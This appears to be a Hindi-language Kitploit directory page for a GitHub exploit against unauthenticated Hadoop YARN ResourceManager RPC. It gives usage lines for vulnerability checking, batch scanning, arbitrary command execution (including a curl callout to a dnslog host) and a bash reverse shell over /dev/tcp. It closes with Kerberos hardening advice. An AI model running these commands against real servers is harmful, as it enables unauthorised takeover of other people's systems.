Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Hadoop-Yarn-ResourceManager-RCE — Hadoop Yan ResourceManager unauthorized RCE | Kitploit
उपकरण/GitHubGitHub/al1ex/hadoop-yarn-resourcemanager-rce
Vulnerability ScannersVulnerability AnalysisExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubal1ex/hadoop-yarn-resourcemanager-rce

Hadoop-Yarn-ResourceManager-RCE

Hadoop Yan ResourceManager unauthorized RCE

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
39144 साल पहलेKitploit द्वारा समीक्षित

भेद्यता प्रभाव

Hadoop yarn ResourceManager में एक अनधिकृत पहुँच भेद्यता थी। यह भेद्यता Hadoop के मुख्य घटक Hadoop yarn में मौजूद थी। चूँकि Hadoop yarn ने RPC सेवा को डिफ़ॉल्ट रूप से सार्वजनिक कर दिया था, एक दूरस्थ हमलावर इस अनधिकृत भेद्यता का लाभ उठाकर RPC सेवा के माध्यम से मनमाने कमांड निष्पादित कर सकता था, जिससे लक्षित सर्वर को नियंत्रित किया जा सकता था। इस भेद्यता की उच्च-जोखिम स्थिति और अत्यधिक हानि को देखते हुए, तथा इसके विवरण सार्वजनिक हो चुके हैं और हमलावरों द्वारा इसका शोषण किया जा चुका है, यह अनुशंसा की जाती है कि Apache Hadoop का उपयोग करने वाले सभी उपयोगकर्ता स्व-परीक्षण करें और समय पर सुरक्षा उपाय करें।

भेद्यता-युक्त उत्पाद

Apache Hadoop Yarn *

भेद्यता जाँच

मूल उपयोग

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py

img

भेद्यता जाँच

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com 

img

कमांड निष्पादन

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

बैच स्कैन

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

रिवर्स शेल

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

संदर्भ

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

सुरक्षा सलाह

1.अनधिकृत पहुँच को रोकने के लिए Kerberos प्रमाणीकरण सक्षम करें।

root@kitploit:~
<property>
    <name>hadoop.security.authentication</name>
    <value>kerberos</value>
    <final>false</final>
    <source>core-site.xml</source>
</property>...
<property>
    <name>hadoop.rpc.protection</name>
    <value>authentication</value>
    <final>false</final>
    <source>core-default.xml</source>
</property>

2.बाहरी पतों को Hadoop RPC सेवा से संबंधित पोर्ट तक पहुँचने से प्रतिबंधित करें या इसे केवल विश्वसनीय पतों के लिए खोलने के लिए कॉन्फ़िगर करें।

गंभीर घोषणा: इस टूल का उपयोग अवैध कार्यों के लिए न करें। यह टूल केवल पार्टी A के कर्मियों और पार्टी B के कर्मियों द्वारा सुरक्षा स्व-जाँच के लिए है। यदि उपयोगकर्ता इसका अवैध उपयोग करता है, तो कानूनी जिम्मेदारी उपयोगकर्ता की होगी!!!

टूल डाउनलोड करें